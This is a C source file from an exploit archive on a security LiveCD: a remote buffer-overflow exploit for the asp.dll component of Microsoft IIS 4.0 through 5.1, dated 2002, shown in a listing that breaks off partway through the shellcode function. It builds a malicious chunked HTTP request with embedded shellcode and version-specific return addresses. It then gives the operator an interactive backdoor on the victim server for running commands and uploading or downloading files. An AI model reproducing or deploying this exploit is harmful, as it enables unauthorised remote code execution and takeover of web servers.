home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / aspcode.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  44.6 KB  |  1,467 lines
  1.    /*
  2.         aspcode.c  ver1.0
  3.         iis4.0┬í┬óiis5.0┬í┬óiis5.1     asp.dll  overflow program
  4.         copy by yuange <yuange@nsfocus.com>  2002.4.24
  5.    */
  6.    #include <windows.h>
  7.    #include <winsock.h>
  8.    #include <stdio.h>
  9.    #include <httpext.h>
  10.    #pragma  comment(lib,"ws2_32")
  11.    //#define  RETEIPADDR  eipwin2000
  12.    #define  FNENDLONG   0x08
  13.    #define  NOPCODE     0x90
  14.    #define  NOPLONG     0x50
  15.    #define  BUFFSIZE    0x20000
  16.    #define  PATHLONG    0x12
  17.    #define  RETEIPADDRESS 0x468
  18.    #define  SHELLBUFFSIZE 0x800
  19.    #define  SHELLFNNUMS   14
  20.    #define  DATABASE      0x61
  21.    #define  DATAXORCODE   0x55
  22.    #define  LOCKBIGNUM    19999999
  23.    #define  LOCKBIGNUM2   13579139
  24.    #define  MCBSIZE       0x8
  25.    #define  MEMSIZE       0xb200
  26.    #define  SHELLPORT   0x1f90   //0x1f90=8080
  27.    #define  WEBPORT     80
  28.    void     shellcodefnlock();
  29.    void     shellcodefnlock2();
  30.    void     shellcodefn(char *ecb);
  31.    void     shellcodefn2(char *ecb);
  32.    void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int
  33.    len);
  34.    void     iisput(int fd,char *str);
  35.    void     iisget(int fd,char *str);
  36.    void     iiscmd(int fd,char *str);
  37.    void     iisreset();
  38.    void     iisdie();
  39.    void     iishelp();
  40.    int newrecv(int fd,char *buff,int size,int flag);
  41.    int newsend(int fd,char *buff,int size,int flag);
  42.      int xordatabegin;
  43.      int  lockintvar1,lockintvar2;
  44.      char lockcharvar;
  45.    int main(int argc, char **argv)
  46.    {
  47.      char *server;
  48.      char *str="LoadLibraryA""\x0""CreatePipe""\x0"
  49.           "CreateProcessA""\x0""CloseHandle""\x0"
  50.           "PeekNamedPipe""\x0"
  51.           "ReadFile""\x0""WriteFile""\x0"
  52.           "CreateFileA""\x0"
  53.           "GetFileSize""\x0"
  54.           "GetLastError""\x0"
  55.           "Sleep""\x0"
  56.           "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
  57.           "\x09""asp.dll""\x0""HttpExtensionProc""\x0"
  58.           "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
  59.           "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
  60.           "XORDATA""\x0""xordatareset""\x0"
  61.           "strend";
  62.    //  char buff0[]="TRACK / HTTP/1.1\nHOST:";
  63.      char buff1[]="GET /";
  64.      char buff2[]="default.asp";
  65.      char *buff2add;
  66.      char buff3[]="?!!ko ";
  67.      char buff4[]=" HTTP/1.1 \nHOST:";
  68.      char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
  69.      char buff51[]="\nTransfer-Encoding:chunked";
  70.      char buff6[]="\nContent-length: 2147506431\r\n\r\n";  //0x80000000+MEMSIZE-1
  71.      char buff61[]="\nContent-length: 4294967295\r\n\r\n";  // 0xffffffff
  72.      char buff7[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
  73.      char buff11[]="\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
  74.      char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
  75.      char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
  76.      char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  77.      /*
  78.      char
  79.    buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
  80.      char
  81.    buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
  82.      char
  83.    buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
  84.      char
  85.    buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
  86.      char
  87.    buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
  88.      char
  89.    buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
  90.    */
  91.      char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  92.      char SRLF[]="\x0d\x0a\x00\x00";
  93.    
  94.      char  *eipexceptwin2000add;
  95.            char  eipexceptwin20002[]="\x80\x70\x9f\x74";   //  push ebx ;ret  address
  96.            char  eipexceptwin2000cn[]="\x73\x67\xfa\x7F";   //  push ebx ;ret  address
  97.            char  eipexceptwin2000[]="\x80\x70\x97\x74";
  98.    //     char  eipexceptwin2000[]="\xb3\x9d\xfa\x77";  // \x01\x78";
  99.    //  call ebx  address
  100.            char  eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
  101.            char  eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
  102.    //     char  eipexceptwin2000[]="\x0B\x08\x5A\x68";
  103.    //  char  eipexceptwin2000[]="\x32\x8d\x9f\x74";
  104.        char  eipexceptwinnt[]  ="\x82\x01\xfc\x7F";     //  push esi ;ret  address
  105.    //     char  eipexceptwinnt[]  ="\x2e\x01\x01\x78";
  106.    //  call  esi  address
  107.    //  char  eipexcept2[]="\xd0\xae\xdc\x77";  //
  108.      char    buff[BUFFSIZE];
  109.      char    recvbuff[BUFFSIZE];
  110.      char    shellcodebuff[BUFFSIZE];
  111.      char    shellcodebuff2[BUFFSIZE];
  112.      struct  sockaddr_in s_in2,s_in3;
  113.      struct  hostent *he;
  114.      char    *shellcodefnadd,*chkespadd;
  115.      unsigned  int sendpacketlong,buff2long,shelladd,packlong;
  116.      int i,j,k,l,strheadlong;
  117.      unsigned  char temp;
  118.      int     fd;
  119.      u_short port,port1,shellcodeport;
  120.      SOCKET  d_ip;
  121.      WSADATA wsaData;
  122.      int offset=0;
  123.      int OVERADD=RETEIPADDRESS;
  124.      int result;
  125.      fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
  126.      fprintf(stderr,"\n copy by yuange 2002.4.24.");
  127.      fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
  128.      fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
  129.      fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n",argv[0]);
  130.      buff2add=buff2;
  131.      if(argc <2){
  132.          fprintf(stderr,"\n please enter the web server:");
  133.          gets(recvbuff);
  134.          for(i=0;i<strlen(recvbuff);++i){
  135.             if(recvbuff[i]!=' ') break;
  136.          }
  137.          server=recvbuff;
  138.          if(i<strlen(recvbuff)) server+=i;
  139.          fprintf(stderr,"\n please enter the .asp filename:");
  140.          gets(shellcodebuff);
  141.          for(i=0;i<strlen(shellcodebuff);++i){
  142.              if(shellcodebuff[i]!=' ') break;
  143.          }
  144.          buff2add=shellcodebuff+i;
  145.          printf("\n .asp file name:%s\n",buff2add);
  146.      }
  147.      eipexceptwin2000add=eipexceptwin2000;
  148.    // printf("\n argc%d argv%s",argc,argv[5]);
  149.      if(argc>5){
  150.          if(strcmp(argv[5],"cn")==0) {
  151.              eipexceptwin2000add=eipexceptwin2000cn;
  152.              printf("\n For the cn system.\n");
  153.          }
  154.          if(strcmp(argv[5],"sp0")==0) {
  155.              eipexceptwin2000add=eipexceptwin20002;
  156.              printf("\n For the sp0 system.\n");
  157.          }
  158.          if(strcmp(argv[5],"msvcrt")==0) {
  159.              eipexceptwin2000add=eipexceptwin2000msvcrt;
  160.              printf("\n Use msvcrt.dll JMP to shell.\n");
  161.          }
  162.          if(strcmp(argv[5],"sp2")==0) {
  163.              eipexceptwin2000add=eipexceptwin2000sp2;
  164.              printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
  165.          }
  166.      }
  167.      result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  168.      if (result != 0) {
  169.            fprintf(stderr, "Your computer was not connected "
  170.                "to the Internet at the time that "
  171.                "this program was launched, or you "
  172.                "do not have a 32-bit "
  173.                "connection to the Internet.");
  174.            exit(1);
  175.        }
  176.    /*
  177.      if(argc>4){
  178.        offset=atoi(argv[4]);
  179.      }
  180.    //  OVERADD+=offset;
  181.    //  packlong=0x10000-offset+0x8;
  182.      if(offset<-0x20||offset>0x20){
  183.         fprintf(stderr,"\n offset error !offset  -32 --- +32 .");
  184.         gets(buff);
  185.         exit(1);
  186.      }
  187.    */
  188.      if(argc <2){
  189.      //     WSACleanup( );
  190.    //       exit(1);
  191.      }
  192.      else  server = argv[1];
  193.      for(i=0;i<strlen(server);++i){
  194.         if(server[i]!=' ')
  195.         break;
  196.      }
  197.      if(i<strlen(server)) server+=i;
  198.      for(i=0;i+3<strlen(server);++i){
  199.    
  200.          if(server[i]==':'){
  201.              if(server[i+1]=='\\'||server[i+1]=='/'){
  202.                  if(server[i+2]=='\\'||server[i+2]=='/'){
  203.                      server+=i;
  204.                      server+=3;
  205.                      break;
  206.                  }
  207.              }
  208.          }
  209.      }
  210.      for(i=1;i<=strlen(server);++i){
  211.          if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
  212.      }
  213.      d_ip = inet_addr(server);
  214.      if(d_ip==-1){
  215.         he = gethostbyname(server);
  216.         if(!he)
  217.         {
  218.           WSACleanup( );
  219.           printf("\n Can't get the ip of %s !\n",server);
  220.           gets(buff);
  221.           exit(1);
  222.         }
  223.         else    memcpy(&d_ip, he->h_addr, 4);
  224.      }
  225.    
  226.      if(argc>3) port=atoi(argv[3]);
  227.      else   port=WEBPORT;
  228.      if(port==0) port=WEBPORT;
  229.      fd = socket(AF_INET, SOCK_STREAM,0);
  230.      i=8000;
  231.      setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
  232.    
  233.      s_in3.sin_family = AF_INET;
  234.      s_in3.sin_port = htons(port);
  235.      s_in3.sin_addr.s_addr = d_ip;
  236.      printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
  237.    
  238.    if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
  239.    sockaddr_in))!=0)
  240.    {
  241.         closesocket(fd);
  242.         WSACleanup( );
  243.         fprintf(stderr,"\n  connect err.");
  244.         gets(buff);
  245.         exit(1);
  246.    }
  247.    
  248.      _asm{
  249.             mov ESI,ESP
  250.             cmp ESI,ESP
  251.      }
  252.      _chkesp();
  253.      chkespadd=_chkesp;
  254.      temp=*chkespadd;
  255.      if(temp==0xe9) {
  256.             ++chkespadd;
  257.             i=*(int*)chkespadd;
  258.             chkespadd+=i;
  259.             chkespadd+=4;
  260.      }
  261.      /*
  262.      shellcodefnadd=shellcodefnlock;
  263.      temp=*shellcodefnadd;
  264.      if(temp==0xe9) {
  265.             ++shellcodefnadd;
  266.             k=*(int *)shellcodefnadd;
  267.             shellcodefnadd+=k;
  268.             shellcodefnadd+=4;
  269.      }
  270.      for(k=0;k<=0x500;++k){
  271.             if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  272.      }
  273.    */
  274.      memset(buff,NOPCODE,BUFFSIZE);
  275.      /*
  276.      strcpy(buff,buff0);
  277.      if(argc>6) strcat(buff,argv[6]);
  278.      else  strcat(buff,server);
  279.      strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");
  280.    
  281.      strcat(buff,buff1);
  282.    */
  283.      strcpy(buff,buff1);
  284.      strheadlong=strlen(buff);
  285.      OVERADD+=strheadlong-1;
  286.    
  287.    if(argc>2) buff2add=argv[2];
  288.    for(;;++buff2add){
  289.         temp=*buff2add;
  290.         if(temp!='\\'&&temp!='/') break;
  291.    }
  292.    // printf("\nfile:%s",buff2add);
  293.    buff2long=strlen(buff2add);
  294.    strcat(buff,buff2add);
  295.    // fprintf(stderr,"\n offset:%d\n",offset);
  296.    // offset+=strheadlong-strlen(buff1);
  297.    
  298.    /*
  299.    for(i=0x404;i<=0x500;i+=8){
  300.       memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  301.       memcpy(buff+offset+i+4,eipexceptwin2000add,4);
  302.      }
  303.    if(argc>5){
  304.        if(strcmp(argv[5],"sp2")==0) {
  305.          memcpy(buff+offset+i,"\x58",1);
  306.        }
  307.    }
  308.    for(i=0x220;i<=0x380;i+=8){
  309.       memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  310.       memcpy(buff+offset+i+4,eipexceptwinnt,4);
  311.      }
  312.    for(i=0x580;i<=0x728;i+=8){
  313.       memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  314.       memcpy(buff+offset+i+4,eipexceptwinnt,4);
  315.      }
  316.    */
  317.    // winnt 0x2cc or 0x71c  win2000 0x130 or 0x468
  318.    //  memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
  319.    shellcodefnadd=shellcodefnlock;
  320.      temp=*shellcodefnadd;
  321.      if(temp==0xe9) {
  322.             ++shellcodefnadd;
  323.             k=*(int *)shellcodefnadd;
  324.             shellcodefnadd+=k;
  325.             shellcodefnadd+=4;
  326.      }
  327.    for(k=0;k<=0x500;++k){
  328.             if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  329.      }
  330.      memset(shellcodebuff2,NOPCODE,BUFFSIZE);
  331.      i=0x1000;
  332.      memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
  333.    
  334.      shellcodefnadd=shellcodefn;
  335.      temp=*shellcodefnadd;
  336.      if(temp==0xe9) {
  337.              ++shellcodefnadd;
  338.             k=*(int *)shellcodefnadd;
  339.             shellcodefnadd+=k;
  340.             shellcodefnadd+=4;
  341.      }
  342.    
  343.      for(k=0;k<=BUFFSIZE;++k){
  344.             if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  345.      }
  346.    //  k+=0x
  347.      memcpy(shellcodebuff,shellcodefnadd,k);   //j);
  348.      cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  349.      for(j=0;j<0x400;++j){
  350.          if(memcmp(str+j,"strend",6)==0) break;
  351.      }
  352.      memcpy(shellcodebuff+k,str,j);
  353.      sendpacketlong=k+j;
  354.      for(k=0;k<=0x200;++k){
  355.             if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
  356.      }
  357.    for(j=0;j<sendpacketlong;++j){
  358.             temp=shellcodebuff[j];
  359.    //         temp^=DATAXORCODE;
  360.             shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
  361.             ++k;
  362.             shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
  363.             ++k;
  364.    }
  365.    j=i+k;
  366.    j=j%8+3;
  367.    shellcodebuff2[i+j+k]=0;
  368.    // j=strlen(shellcodebuff2)%8+3;
  369.    for(j=0;j<=0xe000;j+=4){
  370.       strcat(shellcodebuff2,"\x41\x41\x41\x41");  //  0x2d  sub eax,num32
  371.    //   strcat(shellcodebuff2,eipexceptwin2000cn);
  372.      }
  373.    /*
  374.    strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\
  375.    x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\
  376.    x90");
  377.    for(j=0;j<=0xb00;j+=4){
  378.       strcat(shellcodebuff2,"\x90\x90\x90\x2d");  //  0x2d  sub eax,num32
  379.    }
  380.    */
  381.    // printf("\nbuff:%s",buff);
  382.    printf("\n shellcode long 0x%x\n",sendpacketlong);
  383.    if(argc>4&&strcmp(argv[4],"apache")==0){
  384.           strcat(buff," ");
  385.    }
  386.    else  strcat(buff,buff3);
  387.    printf("\n packetlong:0x%x\n",sendpacketlong);
  388.    strcat(buff,buff4);
  389.    if(argc>6) strcat(buff,argv[6]);
  390.    else  strcat(buff,server);
  391.    strcat(buff,buff5);
  392.    if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
  393.    else  strcat(buff,shellcodebuff2);
  394.    // strcat(buff,buff51);
  395.    if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
  396.         printf("\n for %s system\n",argv[4]);
  397.         strcat(buff,buff61);
  398.    }
  399.    else strcat(buff,buff6);
  400.    // printf("\n send buff:\n%s",buff);
  401.    /*
  402.    i=strlen(buff);
  403.    memset(buff+i,'a',0xc000);
  404.    memset(buff+i+0xc000-strlen(buff7),0,1);
  405.    strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
  406.    */
  407.    // strcpy(buff8,buff7);
  408.    /* temp=buff7[5];
  409.    temp-=offset*0x10;
  410.    buff7[5]=temp;
  411.    i=*(int *)(buff7+4)+2;
  412.    printf("\nSEH=0x%x\n",i);
  413.    */
  414.    /*
  415.    for(i=0;i<8;++i){
  416.      temp=buff7[i];
  417.      printf("%2x",temp);
  418.    }
  419.    */
  420.    /*
  421.    for(i=0;i<0xc000/0x10;++i){
  422.       strcat(buff,buff7);
  423.    }
  424.    */
  425.    // printf("\nbuff=%s\n",buff);
  426.    // strcat(buff,"\r\n");
  427.    // printf("\n send buff:\n%s",buff);
  428.    //  strcpy(buff+OVERADD+NOPLONG,shellcode);
  429.      sendpacketlong=strlen(buff);
  430.    //  printf("buff:\n%s",buff+0x10000);
  431.    /*
  432.    #ifdef DEBUG
  433.      _asm{
  434.          lea esp,buff
  435.            add esp,OVERADD
  436.          ret
  437.      }
  438.    #endif
  439.    */
  440.      lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  441.      lockintvar2=lockintvar1;
  442.      xordatabegin=0;
  443.      for(i=0;i<1;++i){
  444.         j=sendpacketlong;
  445.    //     buff[0x2000]=0;
  446.         fprintf(stderr,"\n send  packet %d bytes.",j);
  447.    //     gets(buff);
  448.         send(fd,buff,j,0);
  449.         buff7[0]=MCBSIZE;
  450.    
  451.         j=MEMSIZE+0x10;
  452.         i=0;
  453.         if(argc>4&&strcmp(argv[4],"winxp")==0)
  454.         {
  455.               j=0x18;
  456.             i=8;
  457.         }
  458.         for(k=0;i<0xc000;i+=0x10){
  459.             if(i>=j) {
  460.    
  461.                   k=((i-j)/(MCBSIZE*8));
  462.                   if(k<=6){
  463.                       memcpy(buff7+0x8,buff10,8);
  464.                       buff7[0x8]=buff8[k];
  465.                       buff7[0xc]=buff9[k];
  466.                   }
  467.                   else memcpy(buff7,buff11,0x10);
  468.             }
  469.             memcpy(buff+i,buff7,0x10);
  470.    
  471.         }
  472.         if(argc>4&&strcmp(argv[4],"apache")==0){
  473.             for(k=0xb000;k<=0xc000;k+=2)
  474.             {
  475.                 memset(buff+k,0x0d,1);
  476.                 memset(buff+k+1,0x0a,1);
  477.             }
  478.             buff[0xc000]=0;
  479.        //     for(k=0;k<0x10;++k)      send(fd,buff,0xc000,0);
  480.        //     printf("\nbuff:%s\n",buff);
  481.         }
  482.         else send(fd,buff,0xc000,0);
  483.    
  484.          k=0;
  485.          ioctlsocket(fd, FIONBIO, &k);
  486.         j=0;
  487.         while(j==0){
  488.             k=newrecv(fd,recvbuff,BUFFSIZE,0);
  489.             if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
  490.                xordatabegin=1;
  491.                fprintf(stderr,"\n ok!recv %d bytes\n",k);
  492.                recvbuff[k]=0;
  493.    //            printf("\n recv:%s",recvbuff);
  494.    //            for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int
  495.    *)(recvbuff+8+4*j));
  496.                k=-1;
  497.                j=1;
  498.             }
  499.             if(k>0){
  500.                 recvbuff[k]=0;
  501.                fprintf(stderr,"\n  recv:\n %s",recvbuff);
  502.             }
  503.         }
  504.      }
  505.      k=1;
  506.      ioctlsocket(fd, FIONBIO, &k);
  507.    // fprintf(stderr,"\n now begin: \n");
  508.    /*
  509.      for(i=0;i<strlen(SRLF);++i){
  510.              SRLF[i]^=DATAXORCODE;
  511.      }
  512.      send(fd,SRLF,strlen(SRLF),0);
  513.      send(fd,SRLF,strlen(SRLF),0);
  514.      send(fd,SRLF,strlen(SRLF),0);
  515.    */
  516.      k=1;
  517.      l=0;
  518.      while(k!=0){
  519.          if(k<0){
  520.              l=0;
  521.              i=0;
  522.              while(i==0){
  523.                  gets(buff);
  524.                  if(memcmp(buff,"iish",4)==0){
  525.                           iishelp();
  526.                         i=2;
  527.                  }
  528.                  if(memcmp(buff,"iisput",6)==0){
  529.                           iisput(fd,buff+6);
  530.                         i=2;
  531.                  }
  532.                  if(memcmp(buff,"iisget",6)==0){
  533.                           iisget(fd,buff+6);
  534.                         i=2;
  535.                  }
  536.                  if(memcmp(buff,"iiscmd",6)==0){
  537.                         iiscmd(fd,buff+6);
  538.                         i=2;
  539.                  }
  540.                  if(memcmp(buff,"iisreset",8)==0){
  541.                         iisreset(fd,buff+6);
  542.                         i=2;
  543.                  }
  544.                  if(memcmp(buff,"iisdie",6)==0){
  545.                         iisdie(fd,buff+6);
  546.                         i=2;
  547.                  }
  548.                  if(i==2)i=0;
  549.                  else i=1;
  550.              }
  551.    
  552.              k=strlen(buff);
  553.    
  554.              memcpy(buff+k,SRLF,3);
  555.        //      send(fd,SRLF,strlen(SRLF),0);
  556.        //      fprintf(stderr,"%s",buff);
  557.    /*
  558.              for(i=0;i<k+2;++i){
  559.                    lockintvar2=lockintvar2*0x100;
  560.                    lockintvar2=lockintvar2%LOCKBIGNUM;
  561.                    lockcharvar=lockintvar2%0x100;
  562.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  563.    //              buff[i]^=DATAXORCODE;
  564.              }
  565.                 send(fd,buff,k+2,0);
  566.    */
  567.              newsend(fd,buff,k+2,0);
  568.    //          send(fd,SRLF,strlen(SRLF),0);
  569.          }
  570.          k=newrecv(fd,buff,BUFFSIZE,0);
  571.          if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
  572.              xordatabegin=1;
  573.              k=-1;
  574.          }
  575.          if(k>0){
  576.    //          fprintf(stderr,"recv %d bytes",k);
  577.    /*
  578.              if(xordatabegin==1){
  579.                  for(i=0;i<k;++i){
  580.                    lockintvar1=lockintvar1*0x100;
  581.                    lockintvar1=lockintvar1%LOCKBIGNUM;
  582.                    lockcharvar=lockintvar1%0x100;
  583.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  584.                  }
  585.              }
  586.    */
  587.              l=0;
  588.              buff[k]=0;
  589.              fprintf(stderr,"%s",buff);
  590.          }
  591.          else{
  592.              Sleep(20);
  593.              if(l<20) k=1;
  594.              ++l;
  595.    
  596.          }
  597.    //      if(k==0) break;
  598.      }
  599.      closesocket(fd);
  600.      WSACleanup( );
  601.      fprintf(stderr,"\n the server close connect.");
  602.      gets(buff);
  603.      return(0);
  604.    }
  605.    void  shellcodefnlock()
  606.    {
  607.           _asm{
  608.                  nop
  609.                  nop
  610.                  nop
  611.                  nop
  612.                  nop
  613.                  nop
  614.                  nop
  615.                  nop
  616.    
  617.                  jmp   next1
  618.    getediadd:      pop   edi
  619.                     mov   esp,edi
  620.                  and   esp,0xfffff0f0
  621.                  jmp   next2
  622.    getshelladd:
  623.                  push  0x01
  624.                  mov   eax,edi
  625.                  inc   eax
  626.                  inc   eax
  627.                  inc   eax
  628.                  inc   eax
  629.                  inc   eax
  630.                  mov   edi,eax
  631.                  mov   esi,edi
  632.        //          sub   sp,8
  633.                  xor   ecx,ecx
  634.    looplock:     lodsb
  635.                  cmp  al,cl
  636.                  jz   shell
  637.                  sub  al,DATABASE
  638.                  mov  ah,al
  639.                  lodsb
  640.                  sub  al,DATABASE
  641.                  shl  ah,4
  642.                  add  al,ah
  643.        //          lea  eax,ptr word [edx*4+al]
  644.                  stosb
  645.                  jmp looplock
  646.    next1:        call  getediadd
  647.    next2:        call  getshelladd
  648.    shell:
  649.                  NOP
  650.                  NOP
  651.                  NOP
  652.                  NOP
  653.                  NOP
  654.                  NOP
  655.                  NOP
  656.                  NOP
  657.    
  658.    
  659.        }
  660.    }
  661.    void shellcodefn(char *ecb)
  662.    {    char        Buff[SHELLBUFFSIZE+2];
  663.        int         *except[3];
  664.        FARPROC     memcpyadd;
  665.        FARPROC     msvcrtdlladd;
  666.        FARPROC     HttpExtensionProcadd;
  667.        FARPROC     Aspdlladd;
  668.    
  669.        FARPROC     RtlEnterCriticalSectionadd;
  670.        FARPROC     Ntdlladd;
  671.        FARPROC     Sleepadd;
  672.        FARPROC     GetLastErroradd;
  673.        FARPROC     GetFileSizeadd;
  674.        FARPROC     CreateFileAadd;
  675.        FARPROC     WriteFileadd;
  676.        FARPROC     ReadFileadd;
  677.        FARPROC     PeekNamedPipeadd;
  678.        FARPROC     CloseHandleadd;
  679.        FARPROC     CreateProcessadd;
  680.        FARPROC     CreatePipeadd;
  681.        FARPROC        procloadlib;
  682.        FARPROC     apifnadd[1];
  683.        FARPROC     procgetadd=0;
  684.        FARPROC     writeclient;
  685.        FARPROC     readclient;
  686.           HCONN       ConnID;
  687.        FARPROC     shellcodefnadd=ecb;
  688.        char        *stradd,*stradd2,*dooradd;
  689.        int         imgbase,fnbase,i,k,l,thedoor;
  690.        HANDLE      libhandle;
  691.        int         fpt;   //libwsock32;
  692.        STARTUPINFO siinfo;
  693.        PROCESS_INFORMATION ProcessInformation;
  694.        HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
  695.        int         lBytesRead;
  696.        int  lockintvar1,lockintvar2;
  697.        char lockcharvar;
  698.        int  shelllocknum;
  699.    //    unsigned char temp;
  700.        SECURITY_ATTRIBUTES sa;
  701.    
  702.        _asm {            jmp    nextcall
  703.             getstradd:   pop    stradd
  704.                          lea    EDI,except
  705.                          mov    eax,dword ptr FS:[0]
  706.                          mov    dword ptr [edi+0x08],eax
  707.                          mov    dword ptr FS:[0],EDI
  708.        }
  709.           except[0]=0xffffffff;
  710.           except[1]=stradd-0x07;
  711.           imgbase=0x77e00000;
  712.           _asm{
  713.              call getexceptretadd
  714.           }
  715.           for(;imgbase<0xbffa0000,procgetadd==0;){
  716.                imgbase+=0x10000;
  717.                if(imgbase==0x78000000) imgbase=0xbff00000;
  718.                if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
  719.    *)(imgbase+0x3c))=='EP'){
  720.                       fnbase=*(int *)(imgbase+*(int
  721.    *)(imgbase+0x3c)+0x78)+imgbase;
  722.                       k=*(int *)(fnbase+0xc)+imgbase;
  723.                       if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
  724.                          libhandle=imgbase;
  725.                          k=imgbase+*(int *)(fnbase+0x20);
  726.                          for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
  727.                            if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int
  728.    *)(4+imgbase+*(int *)k)=='Acor')
  729.                            {
  730.                               k=*(WORD *)(l+l+imgbase+*(int
  731.    *)(fnbase+0x24));
  732.                               k+=*(int *)(fnbase+0x10)-1;
  733.                               k=*(int *)(k+k+k+k+imgbase+*(int
  734.    *)(fnbase+0x1c));
  735.                               procgetadd=k+imgbase;
  736.                               break;
  737.                            }
  738.                          }
  739.                       }
  740.                }
  741.              }
  742.    //├ï├æ├ï├╖KERNEL32┬í┬úDLL├ä┬ú┬┐├⌐┬╡├ÿ├û┬╖┬║├ìAPI┬║┬»├è├╜ GetProcAddress┬╡├ÿ├û┬╖
  743.    //├ù┬ó├Æ├ó├ò├ó┬╢├╣┬┤┬ª├Ç├¡├ü├ï├ï├æ├ï├╖├Æ┬│├â├ª┬▓┬╗├ö├Ü├ç├⌐┬┐├╢┬í┬ú
  744.        if(procgetadd==0) goto  die ;
  745.        i=stradd;
  746.               for(k=1;*stradd!=0;++k) {
  747.                    if(*stradd==0x9) libhandle=procloadlib(stradd+1);
  748.                    else     apifnadd[k]=procgetadd(libhandle,stradd);
  749.                    for(;*stradd!=0;++stradd){
  750.                    }
  751.                    ++stradd;
  752.               }
  753.               ++stradd;
  754.               k=0x7ffdf020;
  755.               *(int *)k=RtlEnterCriticalSectionadd;
  756.        k=stradd;
  757.        stradd=i;
  758.        thedoor=0;
  759.        i=0;
  760.        _asm{
  761.                       jmp  getdoorcall
  762.    getdooradd:     pop  dooradd;
  763.                    mov  l,esp
  764.                    call getexceptretadd
  765.        }
  766.        if(i==0){
  767.            ++i;
  768.            if(*(int *)ecb==0x90){
  769.                if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
  770.                    i=0;
  771.                    thedoor=1;
  772.                }
  773.            }
  774.        }
  775.        if(i!=0){
  776.           *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
  777.           *(int *)(dooradd-0x13)=shellcodefnadd;
  778.          ecb=0;
  779.          _asm{
  780.              call getexceptretadd
  781.          }
  782.          i=ecb;
  783.          i&=0xfffff000;
  784.          ecb=i;
  785.          ecb+=0x1000;
  786.          for(;i<l;++i,++ecb)
  787.          {
  788.                if(*(int *)ecb==0x90){
  789.                    if(*(int *)(ecb+8)==(int *)ecb){
  790.                        if(*(int *)*(int *)(ecb+0x64)=='ok!!')    break;
  791.                    }
  792.                }
  793.          }
  794.          i=0;
  795.          _asm{
